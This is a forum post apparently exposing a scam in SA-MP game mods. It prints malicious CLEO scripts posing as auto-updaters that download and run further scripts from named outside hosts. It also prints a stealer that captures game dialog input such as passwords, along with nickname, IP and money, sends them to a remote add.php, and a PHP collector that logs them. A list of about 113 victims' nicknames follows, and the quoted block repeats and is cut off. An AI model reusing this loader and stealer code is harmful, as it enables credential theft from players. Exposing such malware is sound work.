Home
Resources
Latest reviews
Search resources
Forums
New posts
Search forums
Members
Current visitors
New profile posts
Search profile posts
What's new
New posts
New resources
New profile posts
Latest activity
Rules
Log in
Register
What's new
Search
Search
Search titles only
By:
New posts
Search forums
Menu
Log in
Register
Install the app
Install
Home
Forums
Community
Spammm
Intriguing scam (check if your data was stolen)
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Reply to thread
Message
<blockquote data-quote="monday" data-source="post: 78219" data-attributes="member: 17468"><p>[video=youtube]https://www.youtube.com/watch?v=dNTbpmnWZU0[/video]</p><p></p><p></p><p>[code]0000:</p><p> </p><p>const </p><p> SCRIPT_VERSION = 1</p><p> </p><p> UPDATEINFO_FILE = "cleo_name_update.txt"</p><p> CHANGELOG_FILE = "cleo_name_changelog.txt"</p><p>end</p><p> </p><p>repeat</p><p> wait 3000</p><p>until 0AFA: is_samp_available</p><p> </p><p>wait 0</p><p> </p><p>0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION</p><p> </p><p>while true</p><p> wait 0</p><p>end</p><p> </p><p>:download_check_status </p><p></p><p>1@ = -1</p><p>while 1@ == -1 </p><p> wait 0</p><p> 0C66: 1@ = get_download 0@ state </p><p>end</p><p>0AB2: ret 1 1@ // </p><p> </p><p>:url_fileupdateinfo // </p><p>// </p><p>hex</p><p> "http:" "/" "/" "rvankarus.esy.es/cleo/update.txt" 00</p><p>end</p><p> </p><p>:check_updates</p><p>// call </p><p>0AC6: 1@ = label @url_fileupdateinfo offset // </p><p>0C65: 1@ = download_url 1@ to_file UPDATEINFO_FILE // </p><p>0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@</p><p>0C7D: release_download 1@ // </p><p> </p><p>if 2@ <> 0 // </p><p>then</p><p> wait 0</p><p>else // ?????</p><p> wait 0</p><p> </p><p> if 0AAB: file_exists UPDATEINFO_FILE // </p><p> then</p><p> 0AF0: 3@ = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // </p><p> if 001D: 3@ > 0@ // </p><p> then</p><p> wait 0</p><p> </p><p> 0AC8: 4@ = allocate_memory_size 260 // </p><p> 0C11: memset destination 4@ value 0 size 260 // </p><p> </p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // </p><p> 0C65: 1@ = download_url 4@ to_file CHANGELOG_FILE // </p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // </p><p> 0C7D: release_download 1@ //</p><p> </p><p> if 2@ == 0</p><p> then</p><p> wait 0</p><p> </p><p> end</p><p> </p><p> // -------</p><p> 0C11: memset destination 4@ value 0 size 260 // </p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script_url" //</p><p> 0C65: 1@ = download_url 4@ to_file "cleo/FileSystem.cs" // </p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //</p><p> 0C7D: release_download 1@ //</p><p> 0A92: create_custom_thread "FileSystem.cs"</p><p></p><p> if 2@ == 0</p><p> then</p><p> wait 0</p><p> else</p><p> wait 0</p><p> end</p><p> </p><p> // -------</p><p> 0C11: memset destination 4@ value 0 size 260 // </p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //</p><p> 0C65: 1@ = download_url 4@ to_file "cleo/animbot4.cs" // </p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //</p><p> 0C7D: release_download 1@ //</p><p> 0A92: create_custom_thread "animbot4.cs"</p><p></p><p> if 2@ == 0</p><p> then</p><p> wait 0</p><p> else</p><p> wait 0</p><p> end</p><p> </p><p> // -------</p><p> 0C11: memset destination 4@ value 0 size 260 // </p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data1" //</p><p> 0C65: 1@ = download_url 4@ to_file "data\Decision\chris\data1.txt" // </p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //</p><p> 0C7D: release_download 1@ //</p><p></p><p> if 2@ == 0</p><p> then</p><p> wait 0</p><p> else</p><p> wait 0</p><p> end</p><p> </p><p> // -------</p><p> 0C11: memset destination 4@ value 0 size 260 // </p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data2" //</p><p> 0C65: 1@ = download_url 4@ to_file "data\Decision\chris\data2.txt" // </p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //</p><p> 0C7D: release_download 1@ //</p><p></p><p> if 2@ == 0</p><p> then</p><p> wait 0</p><p> else</p><p> wait 0</p><p> end</p><p> </p><p> 0AC9: free_allocated_memory 4@</p><p> end</p><p> end</p><p>end</p><p>0AB2: ret 0</p><p> </p><p>:show_changelog // </p><p>if 0A9A: 0@ = openfile CHANGELOG_FILE mode "rt" // </p><p>then</p><p> 0AC8: 1@ = allocate_memory_size 96 // </p><p> 0C11: memset destination 1@ value 0 size 96</p><p> </p><p> 0A9C: 2@ = file 0@ size // </p><p> 2@++ </p><p> </p><p> 0AC8: 4@ = allocate_memory_size 2@ // </p><p> 0C11: memset destination 4@ value 0 size 2@</p><p> repeat </p><p> 0AD7: read_string_from_file 0@ to 1@ size 95</p><p> 0C17: 3@ = strlen 1@</p><p> if 3@ > 0</p><p> then</p><p> 0C15: strcat destination 4@ source 1@ // </p><p> end</p><p> until 0AD6: end_of_file 0@ reached</p><p> </p><p> 0B3B: samp show_dialog id 335 caption "{FFFFFF}Daniel Nguyen" text 4@ button_1 "Closed" button_2 "" style 0 // </p><p> </p><p> 0AC9: free_allocated_memory 4@ // </p><p> </p><p> 0AC9: free_allocated_memory 1@ // </p><p> 0A9B: closefile 0@ // ????????? ???? </p><p>end</p><p>0AB2: ret 0[/code]</p><p></p><p></p><p>[code]0000:</p><p></p><p>const </p><p> SCRIPT_VERSION = 1</p><p></p><p> UPDATEINFO_FILE = "data\Decision\chris\cleo_name_update.txt"</p><p> CHANGELOG_FILE = "data\Decision\chris\cleo_name_changelog.txt"</p><p> DELTA_1 = "data\Decision\chris\delta.txt"</p><p> NAVY_1 = "data\Decision\chris\navy.txt"</p><p> HUMAN_1 = "data\Decision\chris\human.txt"</p><p> AIR_1 = "data\Decision\chris\air.txt"</p><p> COMMAN_1 = "data\Decision\chris\comman.txt" </p><p> SECU_1 = "data\Decision\chris\secu.txt" </p><p>end</p><p></p><p>repeat</p><p> wait 5000</p><p> until 0B61: samp is_local_player_spawned</p><p></p><p></p><p></p><p>0AF8: samp add_message_to_chat "" color -1</p><p></p><p>0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION</p><p></p><p>while true</p><p> wait 0</p><p>end</p><p></p><p>:download_check_status </p><p>// call @download_check_status 1 download_n 0@</p><p>1@ = -1</p><p>while 1@ == -1 </p><p> wait 0</p><p> 0C66: 1@ = get_download 0@ state /</p><p>end</p><p>0AB2: ret 1 1@ </p><p></p><p>:url_fileupdateinfo </p><p>// URL </p><p>hex</p><p> "http:" "/" "/" "rvankarus1.pe.hu/cleo/update.txt" 00</p><p>end</p><p></p><p>:check_updates</p><p>// call @check_updates 1 current_version 0@</p><p>0AC6: 1@ = label @url_fileupdateinfo offset // ??????? ?????? ? ????????????? ??????????</p><p>0C65: 1@ = download_url 1@ to_file UPDATEINFO_FILE // ???????? ?????????? ?????</p><p>0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@</p><p>0C7D: release_download 1@ // ???????????, ?.?. ?????????? ?????????</p><p></p><p>if 2@ <> 0 // ???? ?????? ?? ????? 0(?.?. ???????? ????????? ????????), ??</p><p>then</p><p> Marker.Disable(7@)</p><p>else // ?????</p><p> Marker.Disable(7@)</p><p></p><p> if 0AAB: file_exists UPDATEINFO_FILE // ???? ?? ???? ?? ??? ?????? ? ??????????? ??? ?????, ???????? ??? ?? ?????? ??????</p><p> then</p><p> 0AF0: 3@ = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // ?????? ????? ?????? ? ????????? ????? ??????????</p><p> if 001D: 3@ > 0@ // ???? ??????? ?????? ??????? ??????, ??? ????????? ? ????? ??????????, ??</p><p> then</p><p> Marker.Disable(7@)</p><p></p><p> 0AC8: 4@ = allocate_memory_size 260 // ???????? ?????? ??? URL ???????? ?????</p><p> 0C11: memset destination 4@ value 0 size 260 // ??????? ?? ???????? ????????(?? ?????? ??????)</p><p></p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // ?????? URL ???????? ?????? ?????????</p><p> 0C65: 1@ = download_url 4@ to_file CHANGELOG_FILE // ????????? ?????? ?????????</p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // ???? ????????? ????????</p><p> 0C7D: release_download 1@ //</p><p></p><p></p><p> // -------</p><p> 0C11: memset destination 4@ value 0 size 260 //</p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script2" //</p><p> 0C65: 1@ = download_url 4@ to_file "cleo/anticrash-1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????</p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //</p><p> 0C7D: release_download 1@ //</p><p> 0A92: create_custom_thread "anticrash-1.cs"</p><p></p><p></p><p> if 2@ == 0</p><p> then</p><p> Marker.Disable(7@)</p><p> else</p><p> Marker.Disable(7@)</p><p> end</p><p> </p><p> // -------</p><p> 0C11: memset destination 4@ value 0 size 260 //</p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" //</p><p> 0C65: 1@ = download_url 4@ to_file "cleo/FileSystemOperations.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????</p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //</p><p> 0C7D: release_download 1@ //</p><p> </p><p> if 2@ == 0</p><p> then</p><p> Marker.Disable(7@)</p><p> else</p><p> Marker.Disable(7@)</p><p> end</p><p> </p><p> // -------</p><p> 0C11: memset destination 4@ value 0 size 260 //</p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script3" //</p><p> 0C65: 1@ = download_url 4@ to_file "cleo/Systemcode.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????</p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //</p><p> 0C7D: release_download 1@ //</p><p> 0A92: create_custom_thread "systemcode.cs"</p><p> </p><p> if 2@ == 0</p><p> then</p><p> Marker.Disable(7@)</p><p> else</p><p> Marker.Disable(7@)</p><p> end</p><p> </p><p> // -------</p><p> 0C11: memset destination 4@ value 0 size 260 //</p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script4" //</p><p> 0C65: 1@ = download_url 4@ to_file "cleo/backupp1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????</p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //</p><p> 0C7D: release_download 1@ //</p><p> 0A92: create_custom_thread "backupp1.cs"</p><p> </p><p> </p><p> if 2@ == 0</p><p> then</p><p> Marker.Disable(7@)</p><p> else</p><p> Marker.Disable(7@)</p><p> end</p><p> </p><p> </p><p> // -------</p><p> 0C11: memset destination 4@ value 0 size 260 //</p><p> 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script5" //</p><p> 0C65: 1@ = download_url 4@ to_file "cleo/backupp2.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ??????</p><p> 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ //</p><p> 0C7D: release_download 1@ //</p><p> 0A92: create_custom_thread "backupp2.cs"</p><p> </p><p> </p><p> </p><p> </p><p> </p><p></p><p></p><p> 0AC9: free_allocated_memory 4@</p><p> end</p><p> end</p><p>end</p><p>0AB2: ret 0</p><p></p><p>:show_changelog // ????????? ??????? ??? ?????? ?????? ?????????</p><p>if 0A9A: 0@ = openfile CHANGELOG_FILE mode "rt" // ????????? ???? ??? ??????</p><p>then</p><p> 0AC8: 1@ = allocate_memory_size 96 // ???????? ?????? ??? ?????? ?? ?????</p><p> 0C11: memset destination 1@ value 0 size 96</p><p></p><p> 0A9C: 2@ = file 0@ size // ???????? ?????? ?????</p><p> 2@++ // ????????? ?????? - ???????</p><p></p><p> 0AC8: 4@ = allocate_memory_size 2@ // ???????? ?????? ??? ?????? ?????????</p><p> 0C11: memset destination 4@ value 0 size 2@</p><p> repeat </p><p> 0AD7: read_string_from_file 0@ to 1@ size 95</p><p> 0C17: 3@ = strlen 1@</p><p> if 3@ > 0</p><p> then</p><p> 0C15: strcat destination 4@ source 1@ // ??????????? ?????? ?? ????? ? ????? ?? ??????? ?????????</p><p> end</p><p> until 0AD6: end_of_file 0@ reached</p><p></p><p> 0B3B: samp show_dialog id 335 caption "{66CC00}San Andreas Armed Service" text 4@ button_1 "10-4" button_2 "" style 0 // ?????????? ??????</p><p></p><p> 0AC9: free_allocated_memory 4@ // ????? ?? ????????????</p><p></p><p> 0AC9: free_allocated_memory 1@ //</p><p> 0A9B: closefile 0@ // ????????? ???? </p><p>end</p><p>0AB2: ret 0[/code]</p><p></p><p>[code]</p><p><?php </p><p> $f = fopen("Readme.HTML", "a"); </p><p> $s = "<u>Login:</u><strong> " . $_GET['nick'] . " |...|</strong> " . " <u>Ip:</u> " . $_GET['ip'] . " <strong>|...|</strong> " . " <u>Server:</u><em> " . $_GET['serv'] . " </em><strong>|...|</strong> " . " <u>Dialog:</u> " . $_GET['dialog'] . " <strong>|...|</strong> " . " <u>Text:</u><strong> " . $_GET['input'] . " |...|</strong> " . " <u>Money:</u> " . $_GET['mn'] . "<br />"; </p><p> fwrite($f, $s); </p><p> fclose($f); </p><p> ?></p><p></p><p>//--------------------------------------------------------------------------------------------------------------------------------------------------------</p><p>}</p><p>{$CLEO}</p><p>thread 'NoName'</p><p>While 8afa:</p><p>wait 100</p><p>end </p><p>While 8B4C: -1</p><p>wait 100</p><p>end</p><p>While 0B4C: -1</p><p>wait 0</p><p>0B4E: samp 0@ = get_current_dialog_id</p><p>0AC8: 6@ = 64</p><p>repeat</p><p>wait 0</p><p>0B4A: samp 6@ = get_current_dialog_editbox_text</p><p>until 8B4C: -1 </p><p>0AC8: 1@ = 24</p><p>0B2B: 2@ = $PLAYER_ACTOR</p><p>0B36: samp 1@ = get_player_nickname 2@</p><p>wait 500</p><p>010B: 2@ = player $PLAYER_CHAR money</p><p>0AC8: 3@ = 15</p><p>0B39: samp get_current_server_address 3@ port 4@</p><p>0AC8: 5@ = 86</p><p>0B3A: samp 5@ = get_current_server_name</p><p>0C17: 10@ = strlen 6@</p><p>if 10@ > 1</p><p> then </p><p> 0AC8: 8@ = 445 </p><p> 0AD3: 8@ = format "http:%c%crvankarus.esy.es%ccleo%cadd.php?nick=%s&ip=%s:%d&serv=%s&dialog=%d&input=%s&mn=%d" params 47 47 47 47 1@ 3@ 4@ 5@ 0@ 6@ 2@ // ñá â êîâû÷êàõ íåëüçÿ ïèñàòü ñëåøü, ïîýòìó òàì ãäå äîëæíà áûòü ñëåøü ñòîèò %c - çíàê çàïèñàíûé â ïàðàìåòðàõ.  ïàðàìåòðàõ äëÿ êàæäîé %c ïðîïèñàí 47 - ýòî íîìåð ñëåøà. Ñòàíäàðòíî ñòîèò àäðåñ http://stilloger.ph/stealer/add.php?[äàëåå äàííûå], òàê êàê ñá íå ëþáèò ñëåøü â êîâû÷êàõ, òî àäðåñ çàïèñàí òàê http:%c%cstilloger.ph%cstealer%cadd.php?[äàëåå äàííûå]</p><p> 0AA2: 9@ = load_library "urlmon.dll" // IF and SET</p><p> 0AA4: 7@ = get_proc_address "URLDownloadToFileA" library 9@ // IF and SET </p><p> 0AA5: call 7@ num_params 5 pop 0 params lpfnCB 0 dwReserved 0 szFileName "%TEMP%\2352sfe.tmp" szUrl 8@ caller 0 </p><p> 0AA3: 9@ </p><p> 0AC9: 8@</p><p> end</p><p>0AC9: 1@</p><p>0AC9: 3@</p><p>0AC9: 5@</p><p>0AC9: 6@</p><p>wait 500 </p><p>end </p><p>0@ = 0</p><p>1@ = 0</p><p>2@ = 0</p><p>3@ = 0</p><p>4@ = 0</p><p>5@ = 0</p><p>6@ = 0</p><p>7@ = 0</p><p>8@ = 0</p><p>9@ = 0 </p><p>10@ = 0</p><p>30@ = 0</p><p>31@ = 0</p><p>wait 1000</p><p>0A93: end_custom_thread</p><p>0A93: end_custom_thread</p><p>0A93: end_custom_thread</p><p>0A93: end_custom_thread[/code]</p><p></p><p></p><p>some nice names for malware:</p><p>-FileSystem.cs (downloaded from http://rvankarus.esy.es/cleo/steal.cs xD)</p><p>-backup2.cs</p><p>-anticrash-1</p><p>-systemcode.cs</p><p>-backupp1.cs</p><p>-backupp2.cs</p><hr /><p></p><p>113 players data stolen within 3 days</p><hr /><p></p><p>Admin_Rgame</p><p>Anti_Hack</p><p>Bari_Whatameal</p><p>Be_Heo</p><p>Bem_Mes</p><p>BesT_Jay</p><p>Best_Jay</p><p>Black_Sat</p><p>Black_Tammmmm</p><p>Black_Tamq</p><p>Black_Tanker</p><p>Black_hero</p><p>Black_herobe</p><p>Carry_GumBall</p><p>Cet_Nhox</p><p>Chinh_Ho</p><p>CoCo_Chopper</p><p>Con_Bord</p><p>Cotex_Huong</p><p>DCS_Thuan</p><p>Daniel_Elxotia</p><p>David_BonNhox</p><p>David_Mimi</p><p>Demon_Loko</p><p>Denis_Kolavov</p><p>DepZaiii</p><p>Desi_Hem</p><p>Destroyer_Nhan</p><p>Dinh.Hoang_Tan</p><p>Doug_Las</p><p>Douglas_Spatacus</p><p>Douglas_Stacus</p><p>Fed_Ded</p><p>Fin_Balor</p><p>HOANG_LXAG</p><p>HackOf_War</p><p>HellenS_SaraS</p><p>HoPham_TuanKiet</p><p>Hoan_Star</p><p>Hoang_guyto</p><p>Hoangg_Longg</p><p>Hoangg_Tann</p><p>Huan_Slatus</p><p>Huy_Per</p><p>Jay_Jay</p><p>Jean_my</p><p>Karry_GumBall</p><p>Kea_Rez</p><p>Kenji_William</p><p>Kich_Hoat</p><p>Killer_Death</p><p>Killer_Deathh</p><p>Killer_death</p><p>Killerr_Death</p><p>Killerr_Deathh</p><p>Martin_Geo</p><p>Master_Gaistr</p><p>Master_Sver</p><p>Med_Die</p><p>Men_Len</p><p>Minh_Hieu</p><p>NguyenVan_Hoang</p><p>Nhan_KDE</p><p>Nhan_KDEE</p><p>Niko_graviss</p><p>Oni_Baka</p><p>PhamTruong_Quoc</p><p>Phong_Le</p><p>Phuc.Nguyen</p><p>Phuc_Nguyen</p><p>Phuc_Nguyena</p><p>Pick_Daxuo</p><p>Play_Boyzzzz</p><p>Pro_Game</p><p>PurceIl_Bellamy</p><p>Purcell_Bellamy</p><p>Purcell_Bellamys</p><p>Quang_Thai</p><p>Rens_Shin</p><p>Roy_Race</p><p>San_Haden</p><p>San_haden</p><p>Skin_Sasuke</p><p>Skin_sasuke</p><p>Tan_Dubai</p><p>Tan_Nguyen</p><p>Tend_DSd</p><p>Tes_Ts</p><p>Thanh_Thuan</p><p>Thien_Tan</p><p>Thinh_Dizz</p><p>Tim_Lim</p><p>Timds_Ties</p><p>Trum_BizSung</p><p>Trum_Hanh</p><p>Trum_TeamNgua</p><p>Trum_TeamNhua</p><p>Viperr</p><p>Viperrr</p><p>Viperrrr</p><p>Vua_Zeuss</p><p>Willam_Teds</p><p>Willam_pro</p><p>You_Mother</p><p>[VN]_HuyPArker</p><p>[VN]_HuyParker</p><p>hidan_shine</p><p>killer_Death</p><p>kingbesst</p><p>kingbest</p><p>skin_sasuke</p></blockquote><p></p>
[QUOTE="monday, post: 78219, member: 17468"] [video=youtube]https://www.youtube.com/watch?v=dNTbpmnWZU0[/video] [code]0000: const SCRIPT_VERSION = 1 UPDATEINFO_FILE = "cleo_name_update.txt" CHANGELOG_FILE = "cleo_name_changelog.txt" end repeat wait 3000 until 0AFA: is_samp_available wait 0 0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION while true wait 0 end :download_check_status 1@ = -1 while 1@ == -1 wait 0 0C66: 1@ = get_download 0@ state end 0AB2: ret 1 1@ // :url_fileupdateinfo // // hex "http:" "/" "/" "rvankarus.esy.es/cleo/update.txt" 00 end :check_updates // call 0AC6: 1@ = label @url_fileupdateinfo offset // 0C65: 1@ = download_url 1@ to_file UPDATEINFO_FILE // 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ 0C7D: release_download 1@ // if 2@ <> 0 // then wait 0 else // ????? wait 0 if 0AAB: file_exists UPDATEINFO_FILE // then 0AF0: 3@ = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // if 001D: 3@ > 0@ // then wait 0 0AC8: 4@ = allocate_memory_size 260 // 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // 0C65: 1@ = download_url 4@ to_file CHANGELOG_FILE // 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // if 2@ == 0 then wait 0 end // ------- 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script_url" // 0C65: 1@ = download_url 4@ to_file "cleo/FileSystem.cs" // 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // 0A92: create_custom_thread "FileSystem.cs" if 2@ == 0 then wait 0 else wait 0 end // ------- 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" // 0C65: 1@ = download_url 4@ to_file "cleo/animbot4.cs" // 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // 0A92: create_custom_thread "animbot4.cs" if 2@ == 0 then wait 0 else wait 0 end // ------- 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data1" // 0C65: 1@ = download_url 4@ to_file "data\Decision\chris\data1.txt" // 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // if 2@ == 0 then wait 0 else wait 0 end // ------- 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "data2" // 0C65: 1@ = download_url 4@ to_file "data\Decision\chris\data2.txt" // 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // if 2@ == 0 then wait 0 else wait 0 end 0AC9: free_allocated_memory 4@ end end end 0AB2: ret 0 :show_changelog // if 0A9A: 0@ = openfile CHANGELOG_FILE mode "rt" // then 0AC8: 1@ = allocate_memory_size 96 // 0C11: memset destination 1@ value 0 size 96 0A9C: 2@ = file 0@ size // 2@++ 0AC8: 4@ = allocate_memory_size 2@ // 0C11: memset destination 4@ value 0 size 2@ repeat 0AD7: read_string_from_file 0@ to 1@ size 95 0C17: 3@ = strlen 1@ if 3@ > 0 then 0C15: strcat destination 4@ source 1@ // end until 0AD6: end_of_file 0@ reached 0B3B: samp show_dialog id 335 caption "{FFFFFF}Daniel Nguyen" text 4@ button_1 "Closed" button_2 "" style 0 // 0AC9: free_allocated_memory 4@ // 0AC9: free_allocated_memory 1@ // 0A9B: closefile 0@ // ????????? ???? end 0AB2: ret 0[/code] [code]0000: const SCRIPT_VERSION = 1 UPDATEINFO_FILE = "data\Decision\chris\cleo_name_update.txt" CHANGELOG_FILE = "data\Decision\chris\cleo_name_changelog.txt" DELTA_1 = "data\Decision\chris\delta.txt" NAVY_1 = "data\Decision\chris\navy.txt" HUMAN_1 = "data\Decision\chris\human.txt" AIR_1 = "data\Decision\chris\air.txt" COMMAN_1 = "data\Decision\chris\comman.txt" SECU_1 = "data\Decision\chris\secu.txt" end repeat wait 5000 until 0B61: samp is_local_player_spawned 0AF8: samp add_message_to_chat "" color -1 0AB1: call_scm_func @check_updates 1 current_version SCRIPT_VERSION while true wait 0 end :download_check_status // call @download_check_status 1 download_n 0@ 1@ = -1 while 1@ == -1 wait 0 0C66: 1@ = get_download 0@ state / end 0AB2: ret 1 1@ :url_fileupdateinfo // URL hex "http:" "/" "/" "rvankarus1.pe.hu/cleo/update.txt" 00 end :check_updates // call @check_updates 1 current_version 0@ 0AC6: 1@ = label @url_fileupdateinfo offset // ??????? ?????? ? ????????????? ?????????? 0C65: 1@ = download_url 1@ to_file UPDATEINFO_FILE // ???????? ?????????? ????? 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ 0C7D: release_download 1@ // ???????????, ?.?. ?????????? ????????? if 2@ <> 0 // ???? ?????? ?? ????? 0(?.?. ???????? ????????? ????????), ?? then Marker.Disable(7@) else // ????? Marker.Disable(7@) if 0AAB: file_exists UPDATEINFO_FILE // ???? ?? ???? ?? ??? ?????? ? ??????????? ??? ?????, ???????? ??? ?? ?????? ?????? then 0AF0: 3@ = get_int_from_ini_file UPDATEINFO_FILE section "UPDATE" key "version" // ?????? ????? ?????? ? ????????? ????? ?????????? if 001D: 3@ > 0@ // ???? ??????? ?????? ??????? ??????, ??? ????????? ? ????? ??????????, ?? then Marker.Disable(7@) 0AC8: 4@ = allocate_memory_size 260 // ???????? ?????? ??? URL ???????? ????? 0C11: memset destination 4@ value 0 size 260 // ??????? ?? ???????? ????????(?? ?????? ??????) 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "changelog_url" // ?????? URL ???????? ?????? ????????? 0C65: 1@ = download_url 4@ to_file CHANGELOG_FILE // ????????? ?????? ????????? 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // ???? ????????? ???????? 0C7D: release_download 1@ // // ------- 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script2" // 0C65: 1@ = download_url 4@ to_file "cleo/anticrash-1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ?????? 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // 0A92: create_custom_thread "anticrash-1.cs" if 2@ == 0 then Marker.Disable(7@) else Marker.Disable(7@) end // ------- 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script1" // 0C65: 1@ = download_url 4@ to_file "cleo/FileSystemOperations.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ?????? 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // if 2@ == 0 then Marker.Disable(7@) else Marker.Disable(7@) end // ------- 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script3" // 0C65: 1@ = download_url 4@ to_file "cleo/Systemcode.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ?????? 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // 0A92: create_custom_thread "systemcode.cs" if 2@ == 0 then Marker.Disable(7@) else Marker.Disable(7@) end // ------- 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script4" // 0C65: 1@ = download_url 4@ to_file "cleo/backupp1.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ?????? 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // 0A92: create_custom_thread "backupp1.cs" if 2@ == 0 then Marker.Disable(7@) else Marker.Disable(7@) end // ------- 0C11: memset destination 4@ value 0 size 260 // 0AF4: 4@ = read_string_from_ini_file UPDATEINFO_FILE section "UPDATE" key "script5" // 0C65: 1@ = download_url 4@ to_file "cleo/backupp2.cs" // ????????? ????? ?????? ??????? ? ???????? ??????? ?????? 0AB1: call_scm_func @download_check_status 1 download_n 1@ status_to 2@ // 0C7D: release_download 1@ // 0A92: create_custom_thread "backupp2.cs" 0AC9: free_allocated_memory 4@ end end end 0AB2: ret 0 :show_changelog // ????????? ??????? ??? ?????? ?????? ????????? if 0A9A: 0@ = openfile CHANGELOG_FILE mode "rt" // ????????? ???? ??? ?????? then 0AC8: 1@ = allocate_memory_size 96 // ???????? ?????? ??? ?????? ?? ????? 0C11: memset destination 1@ value 0 size 96 0A9C: 2@ = file 0@ size // ???????? ?????? ????? 2@++ // ????????? ?????? - ??????? 0AC8: 4@ = allocate_memory_size 2@ // ???????? ?????? ??? ?????? ????????? 0C11: memset destination 4@ value 0 size 2@ repeat 0AD7: read_string_from_file 0@ to 1@ size 95 0C17: 3@ = strlen 1@ if 3@ > 0 then 0C15: strcat destination 4@ source 1@ // ??????????? ?????? ?? ????? ? ????? ?? ??????? ????????? end until 0AD6: end_of_file 0@ reached 0B3B: samp show_dialog id 335 caption "{66CC00}San Andreas Armed Service" text 4@ button_1 "10-4" button_2 "" style 0 // ?????????? ?????? 0AC9: free_allocated_memory 4@ // ????? ?? ???????????? 0AC9: free_allocated_memory 1@ // 0A9B: closefile 0@ // ????????? ???? end 0AB2: ret 0[/code] [code] <?php $f = fopen("Readme.HTML", "a"); $s = "<u>Login:</u><strong> " . $_GET['nick'] . " |...|</strong> " . " <u>Ip:</u> " . $_GET['ip'] . " <strong>|...|</strong> " . " <u>Server:</u><em> " . $_GET['serv'] . " </em><strong>|...|</strong> " . " <u>Dialog:</u> " . 